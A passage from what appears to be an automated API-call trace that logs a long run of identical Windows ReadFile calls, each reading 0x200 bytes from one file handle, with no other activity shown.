nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, 